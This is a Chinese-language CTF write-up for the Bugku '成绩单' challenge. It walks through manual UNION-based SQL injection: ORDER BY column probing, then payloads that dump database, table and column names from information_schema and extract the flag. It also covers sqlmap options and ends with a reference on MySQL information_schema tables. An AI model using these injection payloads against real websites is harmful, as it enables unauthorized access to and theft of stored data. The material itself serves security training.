Bugku-成绩单

成绩单-writeup

打开题目

访问链接,根据上面提示分别输入1,2,3查询下

尝试输入1’返回异常,输入1’#返回正常,判断存在注入


尝试手动注入
利用order by 判断列数为4列

1
1'order by 4 # 返回正常


1
1'order by 5 # 返回异常


1
2
利用联合查询查看显位payload:
-1'union select 1,2,3,4 #


1
2
爆库名paylaod:
-1'union select 1,database(),3,4 #


1
2
爆表名payload:
-1'union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()#

1
2
爆字段payload:
-1'union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='fl4g'#


1
2
查询数据payload:
-1'union select 1,group_concat(skctf_flag),3,4 from fl4g#


还可以使用sqlmap
进行burp suite抓包,右键保存文件

将文本放在sqlmap的当前目录下,打开sqlmap
爆库

爆表名

爆字段

爆字段信息

1
2
3
4
5
6
7
8
9
10
11
12
Sqlmap命令参数
-r 是读文件 后面是刚才保存的绝对路径
-p 是参数,也就是注入点(选了id是注入点)
-D 是表示选择了后面的这个数据库
-T 指定表
-C 指定要爆的字段

--dbs –>获取数据库名称
--current-db –>获取当前数据库名称
--tables –>获取表
--columns –>获取字段
--dump –>将结果导出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
Mysql数据库information_schema系统表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。

COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表

详情可以点击:https://wenku.baidu.com/view/6358a5fd89eb172ded63b7a8.html
-本文结束感谢您的阅读-